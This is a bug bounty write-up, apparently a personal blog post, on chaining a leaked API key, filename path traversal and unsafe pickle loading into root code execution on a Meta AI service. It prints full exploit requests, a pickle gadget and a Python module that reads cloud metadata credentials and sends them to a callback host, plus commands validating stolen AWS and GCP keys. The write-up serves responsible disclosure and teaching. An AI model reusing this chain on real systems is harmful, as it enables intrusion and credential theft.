< ~/posts

Root RCE and full cloud takeover on a Meta service

I found this at Meta's April 2026 live hacking event in Taiwan, which I was invited to. I chained a hardcoded API key with two path traversals and an unsafe pickle load to get code execution as root on a Meta service, and from there I pulled the container's AWS credentials, two GCP service accounts, and every secret in the account. I will also be honest about how it ended, because the payout was not what I expected.

Quick note before anything: every credential in this write-up is truncated or masked, and all of them were rotated and revoked a long time ago. Nothing here is live.

The target

The asset was a GraphRAG service that was part of Meta's AI meeting and assistant stack, living at REDACTED.aws.metafb.cloud. It runs on AWS ECS Fargate. The wildcard it sat under was the event's special scope, the kind that carries a 20% bonus on top of the normal bounty. As the hostname hints, it was also a development environment.

A lot of nothing, then a key in the JavaScript

We spent the first stretch of the event just crawling the target. Mapping subdomains, walking every endpoint we could reach, throwing the usual things at every input we found. For a good while it was quiet. None of the easy wins were there, and it was starting to feel like one of those targets that just does not give anything up.

Then a slower pass over the front end turned something up. One of the Next.js chunks had an API key hardcoded right there in the client-side JavaScript.

http
GET /_next/static/chunks/5314-8d2abfc6a63fb291.js HTTP/1.1
Host: REDACTED.aws.metafb.cloud

It was sitting in the bundle as a hardcoded fallback default, so anyone reading the JavaScript had it:

javascript
env.FAST_GRAPHRAG_API_KEY || "apprunner_fast_graphrag_fgr_k3y_8x4n9p2q..."

That key was the entry ticket to the GraphRAG endpoints, so the interesting parts of the app were now reachable. On its own a leaked key like this is usually a low or medium finding. The fun started when I looked at what those endpoints actually let me do.

What the key unlocked

The key authenticated the entire GraphRAG API, and the API was not shy. The first thing worth checking was what data sat behind it, so I asked it to list everything:

http
GET /graphene/graph/available-datasets HTTP/1.1
Host: REDACTED.aws.metafb.cloud
X-API-Key: apprunner_fast_graphrag_fgr_k3y_8x4n9p2q...
json
{
  "status": "success",
  "cloud_datasets": [
    {"name": "ai_calling_e17be6e0-d4fe-4fe9-...", "last_updated": "1772834277.58"},
    {"name": "ai_calling_5ed8239d-4033-4f27-...", "last_updated": "..."},
    "... 3,285 more"
  ]
}

That was every AI calling session the service had ever processed. 3,287 of them, going back more than a year, from March 2025 to April 2026. Not mock data either. Reading one back through the graph endpoint returned the real content of a user's session, in this case someone planning a personal ski trip with the assistant:

http
POST /graphene/graph/get_graph HTTP/1.1
Host: REDACTED.aws.metafb.cloud
X-API-Key: apprunner_fast_graphrag_fgr_k3y_8x4n9p2q...
Content-Type: application/json

{"dataset_name": "ai_calling_e17be6e0-d4fe-4fe9-..."}
json
{
  "nodes": [
    {"name": "MORGAN", "description": "AI assistant helping with the planning"},
    {"name": "SKI TRIP", "type": "TRAVEL", "description": "A planned trip for skiing"},
    {"name": "PALISADES", "type": "LOCATION", "description": "A ski resort destination"},
    {"name": "DEAL SEARCH", "type": "PLANNING_TOOL", "description": "Searching for good prices"}
  ],
  "edges": [
    {"source": "MORGAN", "target": "SKI TRIP", "description": "Morgan helps plan the ski trip"}
  ]
}

And it was not read only. The same key could ingest new datasets into the knowledge base and delete existing ones straight out of S3 and DynamoDB. So from one string in a script tag: read, write, and destroy over thousands of real meeting sessions.

That alone would have been a solid finding. But one endpoint in that same API, load_datasources, did something more interesting with the files it accepted.

A file write, then a path traversal

That endpoint takes a project_path and a set of uploaded files, and it auto-creates {project_path}/input/ before saving them. So on top of the read and write I already had over the datasets, here was a raw file write, which is always worth a closer look.

The real problem was that the filename field was never sanitized. A filename like ../../something.py escapes the input/ folder and climbs back up the tree, which turns a normal upload into an arbitrary file write. If I pointed project_path at the installed package directory, I could land a file straight into Python's site-packages, which is on the module search path. That is the pair that made this dangerous: an upload, plus a traversal to put the upload anywhere I wanted.

To prove that, I uploaded a harmless marker file with a traversing filename and pointed project_path at the installed package directory:

http
POST /graphene/graph/load_datasources HTTP/1.1
Host: REDACTED.aws.metafb.cloud
X-API-Key: apprunner_fast_graphrag_fgr_k3y_8x4n9p2q...
Content-Type: multipart/form-data; boundary=----boundary

------boundary
Content-Disposition: form-data; name="project_path"

/usr/local/lib/python3.11/site-packages/fast_graphrag
------boundary
Content-Disposition: form-data; name="files"; filename="../../h1_write_probe.txt"
Content-Type: text/plain

proof of arbitrary write
------boundary--

A normal upload would have been saved under .../fast_graphrag/input/. Instead the server handed back the resolved path, and the ../../ had escaped two levels up out of the input/ folder:

json
{
  "status": "success",
  "message": "Successfully loaded 1 files",
  "files": [{
    "filename": "../../h1_write_probe.txt",
    "path": ".../fast_graphrag/input/../../h1_write_probe.txt"
  }]
}

That resolves to /usr/local/lib/python3.11/site-packages/h1_write_probe.txt, sitting in site-packages rather than the folder it was supposed to stay in. So the filename field was a clean arbitrary file write: I could drop a file anywhere the app user could reach, including Python's module search path.

A file on disk is not code execution, though. Something on the server still had to load or run whatever I wrote, and that was the harder half.

Turning that write into code execution (the hard part)

This is where I lost the most time. A file write is not code execution. A Python file can sit in site-packages all day, but nothing runs it unless something on the server actually imports or loads it. Getting from "files can be written" to "the code runs" took a handful of attempts and a few hypotheses that went nowhere before one finally stuck.

The one that worked was the /visualize endpoint. It loads a file called graph_igraph_data.pklz with pickle.loads(), with no signature check, and the dataset parameter that decides which folder to read from is itself path traversable. Unsafe pickle deserialization is a classic code execution primitive, because pickle lets an object define what happens when it is unpickled.

That gave me the two pieces I needed. First, the actual payload: a small Python module, dropped into site-packages through the same arbitrary write from before. It grabs the process identity, the environment, and the cloud credentials and beacons them out, and it runs the moment anything imports it:

python · h1_rce_module4.py
import os, urllib.request, base64, json

CALLBACK = "http://YOUR_COLLAB.oast.online"

try:
    env = dict(os.environ)
    whoami = os.popen("id").read()
    creds_uri = env.get("AWS_CONTAINER_CREDENTIALS_RELATIVE_URI", "")
    aws_creds = ""
    if creds_uri:
        aws_creds = urllib.request.urlopen(
            "http://169.254.170.2" + creds_uri, timeout=5
        ).read().decode()
    urllib.request.urlopen(
        CALLBACK + "/id?d=" + base64.b64encode(whoami.encode()).decode(), timeout=10,
    )
    urllib.request.urlopen(
        CALLBACK + "/env?d=" + base64.b64encode(json.dumps(env).encode()).decode(),
        timeout=10,
    )
    if aws_creds:
        urllib.request.urlopen(
            CALLBACK + "/awscreds?d=" + base64.b64encode(aws_creds.encode()).decode(),
            timeout=10,
        )
except Exception as e:
    urllib.request.urlopen(
        CALLBACK + "/err?e=" + base64.b64encode(str(e).encode()).decode(), timeout=5
    )

It goes up through the same load_datasources write, this time as ../../h1_rce_module4.py so it lands directly in site-packages:

http
POST /graphene/graph/load_datasources HTTP/1.1
Host: REDACTED.aws.metafb.cloud
X-API-Key: apprunner_fast_graphrag_fgr_k3y_8x4n9p2q...
Content-Type: multipart/form-data; boundary=----boundary

------boundary
Content-Disposition: form-data; name="project_path"

/usr/local/lib/python3.11/site-packages/fast_graphrag
------boundary
Content-Disposition: form-data; name="files"; filename="../../h1_rce_module4.py"
Content-Type: text/plain

[module content above]
------boundary--

Second, a tiny pickle whose only job on load is to import that module. Importing it runs the module's top level, because Python runs a module's top level the first time it is imported:

python
import pickle, gzip

class RCE:
    def __reduce__(self):
        return (__import__, ("h1_rce_module4",))

open("graph_igraph_data.pklz", "wb").write(gzip.compress(pickle.dumps(RCE())))
# 75 bytes

That pickle gets written into the package directory itself (fast_graphrag inside site-packages), one level of traversal up from input/ this time, which is exactly where /visualize loads its data from:

http
POST /graphene/graph/load_datasources HTTP/1.1
Host: REDACTED.aws.metafb.cloud
X-API-Key: apprunner_fast_graphrag_fgr_k3y_8x4n9p2q...
Content-Type: multipart/form-data; boundary=----boundary

------boundary
Content-Disposition: form-data; name="project_path"

/usr/local/lib/python3.11/site-packages/fast_graphrag
------boundary
Content-Disposition: form-data; name="files"; filename="../graph_igraph_data.pklz"
Content-Type: application/octet-stream

[gzipped pickle bytes]
------boundary--

With both files in place, the load fires by pointing the dataset parameter back up the tree into site-packages:

http
GET /visualize?dataset=../../../../../usr/local/lib/python3.11/site-packages HTTP/1.1
Host: REDACTED.aws.metafb.cloud
X-API-Key: apprunner_fast_graphrag_fgr_k3y_8x4n9p2q...

The response was a 500 and nothing else useful. After my code runs, the server tries to render the result as a graph, chokes on it, and throws. That is the whole catch with this one: it was a blind RCE. The response never carried any command output, so from the outside I had no way to see whether my code had actually run. Anything I wanted to confirm, or pull out, had to come back through a side channel.

It also took a few tries to get right, and two things in particular kept tripping me up:

The side channel: proof it ran, as root

Because it was blind, the module did all of its work in place and mailed the results back to me. It read the process identity, the container environment, and the ECS task role credentials from the metadata service, base64 encoded each one, and sent them out as plain HTTP GET requests to a callback host I controlled (I used an Interactsh server). No callback meant the attempt had failed. A callback meant my code had run and the data was already on its way out. That is the whole exfil trick with a blind bug: when you cannot read the response, you make the server come talk to you.

It ran. Three requests landed on my callback server from 34.212.88.131, which is Meta's AWS us-west-2 range on ECS Fargate, each carrying a piece of the container base64 encoded in the query string:

http · interactsh callbacks
GET /id?d=dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3JvdXBzPTAo... HTTP/1.1
Host: YOUR_COLLAB.oast.online
User-Agent: Python-urllib/3.11
remote-address: 34.212.88.131

GET /env?d=eyJEQVRBU0VUX0JVQ0tFVCI6ICJnZW9yZ2VsaXZla2l0... HTTP/1.1
Host: YOUR_COLLAB.oast.online
User-Agent: Python-urllib/3.11
remote-address: 34.212.88.131

GET /awscreds?d=eyJBY2Nlc3NLZXlJZCI6ICJBU0lBWUtDWUdXN1I... HTTP/1.1
Host: YOUR_COLLAB.oast.online
User-Agent: Python-urllib/3.11
remote-address: 34.212.88.131

The Python-urllib user agent is the module calling out from inside the container. Decoding the first blob confirmed it was running as root:

text
uid=0(root) gid=0(root) groups=0(root)
host=ip-10-0-249-248.us-west-2.compute.internal

Decoding the second blob gave the full environment, including the path to the container credentials endpoint:

json · container env
{
  "DATASET_BUCKET": "georgelivekitfastgraphrag-livekitfastgraphragdatas-...",
  "HOSTNAME": "ip-10-0-249-248.us-west-2.compute.internal",
  "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI": "/v2/credentials/415696df-...",
  "AWS_EXECUTION_ENV": "AWS_ECS_FARGATE",
  "AWS_DEFAULT_REGION": "us-west-2",
  "DATASET_TABLE": "fastgraphragDatasets"
}

My module read http://169.254.170.2 plus that relative URI and pulled the ECS task role credentials straight out of the metadata service.

What the AWS credentials unlocked

A blind RCE and a screenshot of a callback is easy for a program to wave away, so the point now was to show exactly how far the access went. The exfiltrated credentials, exported locally, were enough to start confirming real access, with a small harmless proof artifact left at each step so none of it was just a claim. The identity checked out as a Meta AWS account:

bash
$ aws sts get-caller-identity
{
  "Account": "571415640035",
  "Arn": "arn:aws:sts::571415640035:assumed-role/GeorgeLiveKitFastGraphRag-...Siz85aztIBBM/..."
}

From there the blast radius opened up fast:

A quick look at a transcript to confirm what this data actually was:

text · sample transcript from S3
# AI Assistance Session Summary
## Overview
Brief initial greeting from AI assistant Morgan, offering help.
- Morgan introduced themselves as an "AI teammate"
- No action items were generated

The 17 secrets

This is where a container compromise turned into something that reaches well past one box. Values below are cut down to a recognizable prefix on purpose.

SecretWhat it wasValue (masked)
fb_client_secretFacebook / Meta OAuth client secretd339105d62...
okta/client-secretOkta OAuth client secret (SSO)CkX9-d_Sm3m_8w8...
JWT_SECRETJWT signing key (token forgery for any user)3f86cb0ce647...
OPENAI_API_KEYOpenAI service account keysk-svcacct-lbao3chk...
LIVEKIT_API_KEYLiveKit key (join or record any room)APINyqJDF...
LIVEKIT_API_SECRETLiveKit secret25bthQhnBsrL...
livekit/credsSecond LiveKit key and secret pairRag_livekit / A9R4xE1v...
livekit/api-credentialsLiveKit API keys (yaml bundle of the primary key)APINyqJDF... / 25bthQhnBsrL...
matrix/livekit/credentialsThird LiveKit key and secret pairAPIAaNRnLwqMHWL / l5jGXGQt...
gcpGCP service account sso-admin@xr-insight-experiencesprivate_key_id f9129071...
GOOGLE_APPLICATION_CREDENTIALSGCP service account vertex-ai-de-service-account@xr-insight-experiencesprivate_key_id 1baf9ea6...
MORGAN_SERVICE_KEYInternal Morgan service keyMG_3nB8xC1v...
MORGANA_API_KEYInternal Morgana keyapprunner_fast_graphrag...
SPEECH_ASSISTANT_SERVICE_KEYInternal speech assistant keySA_7kX9mP2q...
QUANTIFIED_SELF_API_KEYInternal service keyqs_secret_upload_...
SERPAPI_KEYSerpAPI key3f49fd8b134e...
FAST_GRAPHRAG_API_KEYThe GraphRAG app key, the same one leaked in the JSapprunner_fast_graphrag_fgr_k3y...

The two GCP service accounts were the part that worried me most, because they moved the whole thing out of AWS and into Google Cloud. One of them was named sso-admin. I did not go poking at Meta's Google Workspace, but a service account with that name is exactly the kind of key you flag loudly, because if it can manage SSO or SAML config, that is its own critical path. I validated that the keys were live by activating one locally and printing an access token:

bash
export GOOGLE_APPLICATION_CREDENTIALS="key.json"
gcloud auth activate-service-account --key-file="$GOOGLE_APPLICATION_CREDENTIALS"
gcloud auth print-access-token
# ya29.c.c0AZ4bNpbTM7c5Q1... (valid)

So the final tally from one leaked front-end key: root code execution on the container, the container's AWS role, read and write over 3,287 real session transcripts in S3 and DynamoDB, and 17 secrets including live OAuth client secrets, a JWT signing key, and two GCP service accounts.

Timeline

The response was genuinely fast. From the first report to the credentials starting to get pulled was a single overnight window.

WhenWhat happened
Apr 19, 4:53 PMReported.
Apr 19, 6:21 PMInitial evaluation by a Meta security team member.
Apr 19, 10:45 PMThey asked for the full PoC and the raw, untruncated secrets.
Apr 19, 10:48 PMFull PoC and secrets sent.
Apr 20, ~4:40 AMThe credentials started dying while I was still writing comments. The devs were already rotating them. Fixed in hours.
May 8Bounty.

The part I did not see coming

I asked early on how Meta pays, because I was new to their program and I honestly thought this was a big one. On some platforms a max severity finding pays a max bounty, and a zero interaction account takeover class bug can pay six figures. Their answer was fair and measured. They said they reward based on impact, that they run their own impact investigation beyond what a researcher can confirm from the outside, that they had historically seen little exposure on AWS.

The decision came back at a $500 bounty, plus a $25 Hacker Plus bonus, for a total of $525.

I will be honest, this one left a bad taste. Root on the box, the container's AWS role, read and write over 3,287 real meeting transcripts, two GCP service accounts including one called sso-admin, and 17 secrets with live OAuth client secrets and a JWT signing key sitting in the same account. All of it proven, not theory. And the whole thing came down to $525.

Payout aside, the Meta event itself was a great experience. I got to know Japan and Taiwan, and met a lot of people along the way, and that part I would not trade for anything.

Anyway. That is the write-up. Follow me on Twitter for the next one.